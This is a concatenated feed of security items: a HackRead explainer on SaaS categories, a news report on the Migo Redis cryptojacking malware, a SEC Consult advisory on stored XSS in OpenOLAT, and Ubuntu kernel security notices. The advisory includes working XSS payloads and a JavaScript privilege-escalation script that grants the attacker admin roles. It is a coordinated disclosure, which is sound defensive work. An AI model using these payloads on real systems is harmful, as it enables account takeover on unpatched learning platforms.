By Uzair Amir
Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own…
This is a post from HackRead.com Read the original post: Types of SaaS Applications: Categories and Examples

Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own successful Software as a Service product!

Today, almost any company, from small startups to large enterprises, uses SaaS solutions in its day-to-day operations. With various types of SaaS products becoming essential for business operations, more and more companies are considering building SaaS applications.

If you want to know how to build a SaaS app, learning about the types and categories of these solutions is critical. With this knowledge, you can create a more comprehensive blueprint for your future product and have a deeper understanding of the modern SaaS market.

****About SaaS solutions****

Software as a Service (SaaS) is a software distribution model that allows users to access applications via the Internet on a subscription basis. SaaS is a subset of cloud computing due to the absolute majority of software-as-a-service apps being cloud-based.

Unlike traditional desktop apps, you don’t need to download and install SaaS solutions. Cloud computing allows users to enjoy all of the features and functionalities using remote servers.

The SaaS model began to gain traction in the late 1990s due to the success of web-based CRM systems, such as Salesforce. With the emergence of affordable cloud providers, many companies started to build SaaS products. Let’s talk about the main advantages of the SaaS model:

*   **Cost-effectiveness.** Companies and individuals can usually choose the one that fits them best from several subscription plans. Almost any SaaS offering will still be cheaper than buying traditional software, plus there is no need to spend money on hardware and infrastructure, the responsibility for maintenance, upgrades, and scalability lies with cloud service providers.
*   **Accessibility.** Cloud-based SaaS applications can be accessed from any device with an internet connection and web browser. With just a web browser, users can interact with Software as a Service product without the need to install or update anything manually.
*   **Scalability.** Scalability is often an issue for web applications and websites with traditional, client-server architecture. But you don’t need to worry about how to build a SaaS website or app that can provide scalability without sacrificing performance. Cloud services allow businesses to scale their product back and forth without significant investments or operational downtime.
*   **Security.** Protecting sensitive data is one of the main tasks in the modern software development industry. Reliable cloud providers offer a high level of security due to their decentralized nature. With information being stored in several places at once, it is more difficult for malicious actors to access it.

****SaaS categories****

When experts in SaaS application development describe different types of SaaS solutions, we can often hear two terms: _horizontal_ and _vertical_. An experienced SaaS development company can consult you on which type of app you need, but it is still essential to have a basic understanding of these classifications yourself. Let’s talk about these two categories:

*   **Horizontal SaaS.** If you wonder how to develop a SaaS application that will meet the needs of businesses across multiple industries, horizontal solutions are for you. These products offer features and services that can be applied to various business settings. Horizontal SaaS platforms are often used for improving day-to-day operations, streamlining processes, and increasing productivity.
*   **Vertical SaaS.** If you, on the other hand, want to develop a SaaS application that is designed to meet the needs of a specific industry or organization type, this option is perfect for you. Vertical Software as a Service product is used in healthcare, retail, fintech, and governmental projects. You need specific SaaS development expertise in your team to create vertical apps.

****Types of SaaS Applications****

Vertical and horizontal are the key types of Software as a Service solution, but to know how to build SaaS applications with impressive functionalities and competitive advantage, you need to learn about the most widely used categories of SaaS.

****CRM software****

This is one of the most popular types of B2B SaaS software that almost any company has experience with. Customer Relationship Management (CRM) system is an essential part of any business workflow and enables companies to keep track of customer data and gain valuable insights about clients’ preferences and behaviour.

Most of the modern CRM solutions offer task automation, advanced analytics, and even predictive analysis based on customer data. The most well-known CRM software today are Salesforce, Hubspot, Zoho, and Microsoft Dynamics 365.

If you want to learn more about developing SaaS applications like these, take a closer look at their core features and implementation of cutting-edge technologies like AI and ML, and consult with a SaaS application development company that has successful cases of building CRM SaaS products.

****CMS software****

Content Management Systems (CMS) enable individuals with no experience in the software development process to create and manage web pages and digital content. Unlike the majority of SaaS types on our list, CMS is not designed specifically for business use, but companies still can benefit from them, creating basic websites without a development team.

Today, there are four top CMS SaaS products: WordPress, Drupal, Shopify, and Joomla. Each solution has its long list of pros and cons, struggling in certain aspects and excelling in others.

To build a SaaS app that will be as good if not better than these five, you need to not only have a good understanding of the SaaS model and have a reliable SaaS app development partner but also to become familiar with the most widely used CMS SaaS products and their features and functionalities.

****ERP software****

Enterprise Resource Planning (ERP) software is used by companies of any size for managing business processes. These SaaS applications offer such features as inventory and order management, operations scheduling, customer relationships management, and handling of accounting tasks. Many ERP solutions try to integrate CRM, project management, accounting, and HR modules, making them the types of SaaS software that companies need for managing day-to-day operations.

The most prominent players in the ERP industry are SAP, Oracle, NetSuite, and Microsoft Dynamics 365. As you can see, Microsoft Dynamics appears in our list in the second category already due to its different functionalities and features that can be used in various processes. It can serve as a lesson for anyone interested in how to create a SaaS application that is always in demand.

****Project management software****

Project management tools are widely used today for planning, executing, and monitoring projects. They help to improve efficiency by creating workflows, enabling teams to keep track of different tasks, and reducing the chance of miscommunications and errors. Modern project management software also leverages AI capabilities for repetitive task automation, data visualization, and report generation.

The most successful SaaS project management tools today are Trello, Asana, Jira, Microsoft Project, and Notion. These solutions offer essential features and capabilities needed for efficient project management, but each one has its own unique additions and distinct user interface. By researching these tools, you can learn how to create SaaS applications that can be used for project management tasks by companies from different industries.

****HR software****

Human Resources (HR) software enables organizations to seamlessly manage employee data and create a streamlined HR process from recruitment to retirement. It allows companies to save time, administrative resources, and money. No wonder that more and more SaaS development companies have decided to develop SaaS applications for HR purposes.

The most widely used and acclaimed HR software products are SAP, ADP, Workday, Zoho People, and BambooHR. These tools not only provide features and capabilities for managing all of an organization’s HR operations but also work seamlessly with third-party integrations and offer robust analytics. Of all the types of SaaS products, this is one of the most promising ones, considering that businesses of any size and industry have employees and HR tasks that need solving from time to time.

****Accounting and billing software****

Every company needs tools for processing payments and managing finances. Accounting and billing SaaS solutions offer an efficient and cost-effective way to control finances and streamline operations. The most widely used accounting Software as a Service platforms are Xero, QuickBooks Online, and Freshbooks. All of these solutions offer such benefits as easier compliance with regulations, real-time data insights, and improved collaboration between departments.

As for billing software, it is crucial to find reliable solutions with perfect reputations. Among the most well-known and established payment gateways you can integrate within your platform during SaaS platform development are PayPal and Stripe. By researching and comparing accounting and billing software, you can gain valuable insights into building a SaaS product for efficient financial management.

****Communication software****

During the global pandemic, communication software grew in popularity beyond the boldest projections, and today, more and more companies dream of building a SaaS platform that will be used for remote work and corporate communication.

The most popular SaaS communication software today is Slack, Google Meets, Zoom, Skype, and Microsoft Teams. Most of these tools are free, with some additional features available for an extra price. Modern communication tools provide such capabilities as file sharing, screen sharing, chat recording, and remote control. With remote work becoming more and more popular, developing SaaS applications for communication and collaborations seems like a safe bet and an excellent investment.

****Conclusion****

With numerous types of SaaS services available today, it can be easy to get confused, but a deep understanding of these basics is the first step to becoming a real expert in SaaS software development. Of course, you can just hire a SaaS application development services provider; however, without your input at the planning stage and a clear vision for the final product, chances for success are much lower.

After choosing the type of Software as a Service product you want to develop, you and your development team can choose the right tech stack, avoid many SaaS application development challenges, and build the SaaS application of your dreams.

****RELATED ARTICLES****

1.  **20 Best Amazon PPC Management Agencies**
2.  **SaaS Security Best Practices: Safeguard Consumer Data**
3.  **15 Best SaaS SEO Experts That Will Help You Dominate Online**
4.  **How To Reduce Cost Overruns For AI Implementation Projects**
5.  **The Role of DevOps in Streamlining Cloud Migration Processes**

Types of SaaS Applications: Categories and Examples

By Deeba Ahmed
Migo Malware Campaign: User-Mode Rootkit Hides Cryptojacking on Linux Systems.
This is a post from HackRead.com Read the original post: New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security

New “Migo” malware targets Linux servers, exploiting Redis for cryptojacking. Using a user-mode rootkit, hides its activity, making detection difficult. Secure your Redis servers and stay alert!

A sophisticated Linux malware campaign has been discovered **targeting Redis**, a popular data store system, to gain initial access using “System Weakening Commands,” revealed Cado Security Labs.

Cado researchers disclosed that the malware, dubbed Migo, exploits Redis for **cryptojacking**. The attackers execute commands on their target’s Redis servers to disable configuration options and make them vulnerable before deploying the payload.

The primary payload, Migo, is a Golang ELF binary that retrieves an **XMRig installer** from GitHub. Redis system weakening commands are used to disable configuration options, such as protected mode and replica-read-only, using CLI commands to execute malicious payloads from external sources like **Pastebin** to mine cryptocurrency in the background.

For your information, Protected mode is a Redis server operating mode introduced in version 3.2.0 to mitigate potential network exposure. It only accepts connections from the loopback interface and is likely disabled at initial access to allow attackers to send additional commands.

Conversely, the replica-read-only feature in Redis prevents accidental writes to replicas that may result in out-of-sync. Cado researchers report exploitation of this feature for malicious payload delivery, with Migo attackers likely disabling it for future Redis server exploitation.

Migo uses compile-time obfuscation and a user-mode rootkit ‘libprocesshider,’ to hide processes and artefacts, making it difficult for security analysts to detect and mitigate the threat. Once the miner is installed, Migo sets XMRig’s configuration to query system information, including logged-in users and resource limits.

“It also sets the number of Huge Pages available on the system to 128, using the vm.nr\_hugepages parameter. These actions are fairly typical for cryptojacking malware,” Matt Muir, Cado Security’s security researcher noted in a **blog post**.

It executes shell commands to copy the binary, disable SELinux, identify uninstallation scripts, execute the miner, kill competing processes, register persistence, and prevent outbound traffic to specific IP addresses and domains.

Moreover, Migo relies on systemd service and timer for persistence and the developers have obfuscated symbols and strings in the pclntab structure to complicate the malware analysis process. The involvement of a user-mode rootkit also complicates post-incident forensics of compromised hosts, and libprocesshider hides on-disk artefacts.

Migo’s emergence shows that cloud-focused attackers are continually refining their techniques and focused on exploiting web-facing services. They used Redis system weakening commands to disable security features, a move not previously reported in campaigns exploiting Redis for initial access, researchers concluded.

****RELATED ARTICLES****

1.  **Hackers behind Mirai botnet & DYN DDoS attacks plead guilty**
2.  **Hackers behind Mirai botnet to avoid jail for working with the FBI**
3.  **Tiny Mantis Botnet Can Launch Powerful DDoS Attacks Than Mirai**
4.  **Reaper malware outshines Mirai; hits millions of IoT devices worldwide**
5.  **Mirai Variant ‘OMG’ Turns IoT Devices into Proxy Servers for Cryptomining**

New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security

OpenOLAT versions 18.1.4 and below and versions 18.1.5 and below suffer from multiple persistent cross site scripting vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20240220-0 >  
=======================================================================  
               title: Multiple Stored Cross-Site Scripting Vulnerabilities  
             product: OpenOLAT (Frentix GmbH)  
  vulnerable version: <= 18.1.4 and <= 18.1.5  
       fixed version: 18.1.6 / 18.2  
          CVE number: CVE-2024-25973, CVE-2024-25974  
              impact: High  
            homepage: https://www.openolat.com/  
               found: 2023-12-20 and 2024-01-20  
                  by: Mike Klostermaier (Office Berlin)  
                      Johannes Völpel (Office Berlin)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"frentix operates in the areas of e-learning, software development, multimedia  
and media production. Providing information and lasting impressions – we  
try to reconcile this goal in the area of tension between technology, usability  
and design."

"The LMS OpenOlat is an internet-based learning platform for teaching, learning,  
assessment and communication, an LMS, a learning management system."

Source: https://www.openolat.com/unternehmen/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)  
Insufficient filtering and sanitization of user input leads to the creation  
of groups, courses and other resources that contain XSS payloads.  
This allows an attacker to execute JavaScript code with the permissions of the  
victim in the context of the user's browser.

2) Privilege escalation via XSS due to insecure CSP  
If the content security policy is not set securely and there is content on  
the same page that can be manipulated by the attacker, a privilege  
escalation can take place.

3) Stored Cross-Site-Scripting within the Media Center (CVE-2024-25974)  
Insufficient filtering and sanitization of malicious files uploaded by a user  
leads to stored resources within the Media Center that could contain XSS payloads.  
This allows an attacker to execute JavaScript code with the permissions of the  
victim in the context of the user's browser.

Proof of concept:  
-----------------  
1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)  
Various XSS issues have been found in different functions of OpenOLAT.  
The following examples show different attack scenarios.

Example 1 - Stored Cross-Site-Scripting within Coursenames  
Due to insufficient filtering and sanitization of user input, an attacker  
with rights to create or edit groups can create a course with a name that  
contains an XSS payload. When a user edits this course the name including  
the payload is displayed and executed. Furthermore, the XSS payload is  
executed when editing the course via the course-editor, within the course-editor's  
"layout" tab inside the preview. This also happens multiple times at multiple  
locations during the publishing workflow.

The following payload was used as coursename:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```

Example 2 - Stored Cross-Site-Scripting within Catalogname  
An attacker, who is authenticated with rights that allow creating or renaming  
catalogs, is able to create a catalog (also called sub-category) with a name that  
contains an XSS payload due to insufficient filtering and sanitization of user  
input.  
When a user publishes a course, the name of the catalog including the  
payload is displayed and executed within the "Create catalog entry" tab  
when selecting "Add to catalog".

The following payload was used as the catalog name:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```

Example 3 - Stored Cross-Site-Scripting within Curriculum Management  
An authenticated user of a role, who has the authorization to create  
curriculums, is able to create curriculums, whose name contains a JavaScript  
payload. These are shown to the members in some views where the JavaScript  
payload is executed. To do this, navigate to the overview of the curriculums  
via "Curriculum management".  
A curriculum can be created via the "Create new curriculum" button in the  
window that appears. To recreate the vulnerability, it is sufficient to  
enter a JavaScript payload as the identifier.

The following payload was used as curriculum name:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```  
When a user with sufficient rights opens the manipulated curriculum via the  
"curriculum browser" within the "Curriculum management" the payload within  
the curriculum name gets executed within the context of the user's browser.

Example 4 - Stored Cross-Site-Scripting within Alt-Text of Media-Files  
An attacker, who is authenticated with rights that allow uploading files,  
can upload media files via the "Media Centre" and enter metadata for these  
files. One of the fields used for image metadata is the so-called alt-text  
field, which is used to enter an alternative display text for image files.  
This alternative text is not sanitized properly when entered during the upload  
of files.

The following payload was assigned to an image file as alt-text:  
```  
"><img src=a onerror=alert(document.location)>  
```

The upload of the image file works without further problems and is confirmed.  
After successfully uploading the image with a manipulated alt-text, the  
transmitted payload is executed directly. Using the function to share content  
with other users, this manipulated image can be shared to potential victims  
(e.g. a system administrator). The user to whom the image has been shared with  
can preview it in their media center. As soon as the user views the image details,  
the JavaScript payload stored within the alt-text is executed in the context  
of the victim's browser.

2) Privilege escalation due to unsafe-eval  
If the content security policy is not set securely and there is content on the  
same page that can be manipulated by the attacker, a privilege escalation  
can take place. As the content security policy is set to "Report-Only" and  
"unsafe-eval" is set by default in OpenOLAT, it can be possible to use the  
following attack at least in most cases shown here using stored XSS.

An example that loads a script from an external source was not used here,  
as this would not have been possible with an activated CSP, whereas this  
vulnerability can also be exploited with an activated standard CSP from  
OpenOLAT.  
The following example can be used at any given point where a XSS is possible  
and another string can be manipulated within a readable context:  
```  
"><img src=x onerror='var ps = document.querySelectorAll(`p`); for (var i = 0; i  
< ps.length; i++) { var c = ps[i].textContent; if (c.startsWith(`YXN`))  
{ eval(atob(c)); } }'  
```

This JavaScript code searches the website for elements that begin  
with a certain string (in our example "YXN"), decodes them from base64 and  
executes them (due to the unsafe-eval policy) as JavaScript code.  
This has been tested to be working with example 4 with the above payload  
as the alt-text and the payload mentioned below as the description of the  
media file.  
The string "YXN" is the start of the base64-encoded following payload:  
```  
async function main() {  
     function sleep(ms) {  
         return new Promise(resolve => setTimeout(resolve, ms));  
     }  
     var n = 2000;  
     var anchorElement = document.querySelector('a[title="Manage users and system groups"]');  
  anchorElement.click();  
     await sleep(n);  
     var buttons = document.querySelectorAll('a[title="Organisations"]');  
     buttons[0].click();  
     await sleep(n);  
     var links = document.querySelectorAll('a');  
     var organisationLink = Array.from(links).find(function (link) {  
         return link.textContent === 'OpenOLAT';  
     });  
     organisationLink.click();  
     await sleep(n);  
     var links = document.querySelectorAll('a');  
     var chadLink = Array.from(links).find(function (link) {  
         return link.textContent === 'Chad';  
     });  
     await sleep(n);  
     chadLink.click();  
     await sleep(n);  
     var roleTabLinks = document.querySelectorAll('a[role="tab"]');  
     var rolesLink = Array.from(roleTabLinks).find(function (link) {  
         return link.textContent === 'Roles';  
     });  
     await sleep(n);  
     rolesLink.click();  
     await sleep(n);  
     var inputElement = document.querySelector('input[value="administrator"]');  
     inputElement.click();  
     await sleep(n);  
     var inputElement = document.querySelector('input[value="sysadmin"]');  
     inputElement.click();  
     await sleep(n);  
     var saveButton = document.querySelector('button[value="Save"]');  
     saveButton.click();  
}  
main();  
```

The code shown here utilizes the static structure of OpenOLAT. The use of  
control elements is predictable, as long as the name of the organization used  
within the OpenOLAT instance is known. This information is freely accessible to  
every logged-in user. Lines 14 and 20 contain variables which must be adapted  
to the corresponding OpenOLAT instance and attacker username. The executed  
script searches for HTML elements with predictable names in order to navigate  
to an administrative interface within the application and elevate the  
attacker's rights to administrative level.

The script works with two-second pauses between the individual actions  
to ensure that all actions are only executed after the page has loaded. Even  
if this is visible to the victim, the waiting times between the actions can be  
optimized in a real attack and can also be used with the help of obfuscation  
measures (e.g. additional windows that open and hide the actions).

3) Stored Cross-Site-Scripting (XSS) within the Media-Center (CVE-2024-25974)  
It is possible to upload files within the Media Center of OpenOLAT version 18.1.5  
as an authenticated user without any other rights.  
While the filetypes are limited, an SVG containing an XSS payload can be  
uploaded. The following content has been uploaded within a file  
named 'xss.svg':  
```  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<script type="text/javascript">  
     alert(document.location);  
</script>  
</svg>  
```

After a successful upload the file can be shared with groups of users.  
By sharing the file with a group of which an administrator is part of, the  
administrator can access the file and open it, which will open the file in a  
new tab within the browser. This leads to the execution of the shown script and  
will display a message window stating the current domain and path.

Vulnerable / tested versions:  
-----------------------------  
The following versions has been tested which was the latest version available  
at the time of the test:  
* OpenOLAT 18.1.4 Vulnerability 1 and 2  
* OpenOLAT 18.1.5 Vulnerability 3

OpenOLAT version 18.2 was verified whether the identified issues were properly  
fixed.

Vendor contact timeline:  
------------------------  
2024-01-10: Contacting vendor through contact@frentix.com  
2024-01-10: Very quick vendor response within an hour, sending security  
             advisory to provided contact.  
2024-01-10: Feedback from vendor that we submitted known/already fixed issues  
             for version 18.1.  
             Retesting latest version 18.1.4, but only three of our submitted  
             issues had been fixed before (removed from advisory), found  
             additional, new XSS issues again in latest version.  
2024-01-11: Sending updated security advisory to the vendor.  
2024-01-11: Quick feedback from vendor declaring example 1 to 3 as accepted  
             risk, as authors have a trusted position and XSS is only seen as  
             a risk if the attacker is unauthenticated or has low privileges.  
             Example 4 will be patched with the upcoming release. No comment  
             from the vendor on vulnerability 2 regarding the unsafe default  
             configuration.  
2024-01-11: Sending examples 1 to 3 and explaining the risk potential from an  
             attacker's perspective to the vendor. Co-ordination with the vendor  
             regarding the release date of the new version, which includes a fix  
             for example 4. Asking again about the standard configuration  
             mentioned in vulnerability 2 and the vendor's position or judgement  
             on this.  
2024-01-11: Quick reply from the vendor confirming the release date of the new  
             version on 2024-01-17. With regard to examples 1 to 3, the vendor  
             confirmed that no fix is planned. Reference is made to modules in  
             development which will replace the modules containing  
             vulnerabilities in the course of upcoming releases. With regard  
             to privilege escalation, which is enabled by the CSP in chapter 2,  
             the vendor points out that the "unsafe-eval" or "unsafe-inline"  
             option cannot simply be deactivated in the architecture currently  
             in use. With regard to the "report-only" setting of the CSP, the  
             vendor refers to the lack of possibilities to enforce this on  
             the part of the vendor. However, the vendor advises customers to  
             activate it.  
2024-01-17: Release of version 18.1.5 by the vendor. A fix of example 1, 2 and 4  
             was verified by the researchers within this version. Example 3 as  
             well as the CSP from chapter 2 are still exploitable. The PoC code  
             snipped has been redacted in example 3.  
2024-01-18: Mail from vendor, informing us about the release of the patched  
             version. Vendor states, that the development of OpenOLAT will use  
             all points from this advisory as guidance for further improvements.  
2024-01-19: Sending mail to vendor confirming that the examples 1, 2 and 4  
             are fixed. Submitted updated draft of this advisory.  
2024-01-21: Informing vendor about new found XSS within the Media Center, which  
             has been added to this advisory as vulnerability 3 (SVG).  
2024-01-21: Fast response from vendor informing us, that the found XSS will be  
             fixed with an update at the end of January.  
2024-01-23: Sending mail to the vendor thanking for the quick reply.  
2024-01-31: Release of version 18.1.6 by the vendor.  
2024-02-09: The researchers can confirm, that all vulnerabilities mentioned  
             within chapters 1 and 3 are fixed and can no longer be exploited.  
             Vulnerability 2 still works as documented. Informing the vendor,  
             that we can confirm the fix and thanking again for the quick and  
             solution-oriented communication.  
2024-02-09: Vendor: Systematic search for further XSS issues, version 18.2.1  
             contains even more fixes. Version 19 will have CSP enabled by  
             default.  
2024-02-13: Assigning CVE numbers.  
2024-02-20: Coordinated release of security advisory.

Solution:  
---------  
The vendor provided a patched version 18.1.6 / 18.2 or higher which can be downloaded  
from:  
https://www.openolat.com/releases/

Additionally, it is advised to set the Content-Security-Policy active, instead  
of "Report-Only" as well as configuring it as strictly as possible. The upcoming  
version 19 will enable CSP by default.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Johannes Völpel & Mike Klostermaier / @2024

OpenOLAT 18.1.5 Cross Site Scripting / Privilege Escalation

Ubuntu Security Notice 6647-1 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the Rose X.25 protocol implementation in the Linux kernel, leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6647-1February 21, 2024linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp,linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)It was discovered that the netfilter connection tracker for netlink in theLinux kernel did not properly perform reference counting in some errorconditions. A local attacker could possibly use this to cause a denial ofservice (memory exhaustion). (CVE-2023-7192)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):   linux-image-4.15.0-1128-oracle  4.15.0-1128.139   linux-image-4.15.0-1149-kvm     4.15.0-1149.154   linux-image-4.15.0-1159-gcp     4.15.0-1159.176   linux-image-4.15.0-1165-aws     4.15.0-1165.178   linux-image-4.15.0-1174-azure   4.15.0-1174.189   linux-image-4.15.0-222-generic  4.15.0-222.233   linux-image-4.15.0-222-lowlatency  4.15.0-222.233   linux-image-aws-lts-18.04       4.15.0.1165.163   linux-image-azure-lts-18.04     4.15.0.1174.142   linux-image-gcp-lts-18.04       4.15.0.1159.173   linux-image-generic             4.15.0.222.206   linux-image-kvm                 4.15.0.1149.140   linux-image-lowlatency          4.15.0.222.206   linux-image-oracle-lts-18.04    4.15.0.1128.133   linux-image-virtual             4.15.0.222.206Ubuntu 16.04 LTS (Available with Ubuntu Pro):   linux-image-4.15.0-1128-oracle  4.15.0-1128.139~16.04.1   linux-image-4.15.0-1159-gcp     4.15.0-1159.176~16.04.1   linux-image-4.15.0-1165-aws     4.15.0-1165.178~16.04.1   linux-image-4.15.0-1174-azure   4.15.0-1174.189~16.04.1   linux-image-4.15.0-222-generic  4.15.0-222.233~16.04.1   linux-image-4.15.0-222-lowlatency  4.15.0-222.233~16.04.1   linux-image-aws-hwe             4.15.0.1165.148   linux-image-azure               4.15.0.1174.158   linux-image-gcp                 4.15.0.1159.149   linux-image-generic-hwe-16.04   4.15.0.222.6   linux-image-gke                 4.15.0.1159.149   linux-image-lowlatency-hwe-16.04  4.15.0.222.6   linux-image-oem                 4.15.0.222.6   linux-image-oracle              4.15.0.1128.109   linux-image-virtual-hwe-16.04   4.15.0.222.6After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6647-1   CVE-2023-51780, CVE-2023-51782, CVE-2023-7192

Ubuntu Security Notice USN-6647-1

Ubuntu Security Notice 6646-1 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the Rose X.25 protocol implementation in the Linux kernel, leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6646-1February 20, 2024linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-kvm: Linux kernel for cloud environments- linux-lts-xenial: Linux hardware enablement kernel from Xenial for TrustyDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)It was discovered that the netfilter connection tracker for netlink in theLinux kernel did not properly perform reference counting in some errorconditions. A local attacker could possibly use this to cause a denial ofservice (memory exhaustion). (CVE-2023-7192)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS (Available with Ubuntu Pro):   linux-image-4.4.0-1129-kvm      4.4.0-1129.139   linux-image-4.4.0-1166-aws      4.4.0-1166.181   linux-image-4.4.0-251-generic   4.4.0-251.285   linux-image-4.4.0-251-lowlatency  4.4.0-251.285   linux-image-aws                 4.4.0.1166.170   linux-image-generic             4.4.0.251.257   linux-image-generic-lts-xenial  4.4.0.251.257   linux-image-kvm                 4.4.0.1129.126   linux-image-lowlatency          4.4.0.251.257   linux-image-lowlatency-lts-xenial  4.4.0.251.257   linux-image-virtual             4.4.0.251.257   linux-image-virtual-lts-xenial  4.4.0.251.257Ubuntu 14.04 LTS (Available with Ubuntu Pro):   linux-image-4.4.0-1128-aws      4.4.0-1128.134   linux-image-4.4.0-251-generic   4.4.0-251.285~14.04.1   linux-image-4.4.0-251-lowlatency  4.4.0-251.285~14.04.1   linux-image-aws                 4.4.0.1128.125After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6646-1   CVE-2023-51780, CVE-2023-51782, CVE-2023-7192

Ubuntu Security Notice USN-6646-1

A single, vendorwide, hardcoded AES key in the Yealink Configuration Encrypt Tool used to encrypt provisioning documents was leaked leading to a compromise of confidentiality of provisioning documents.

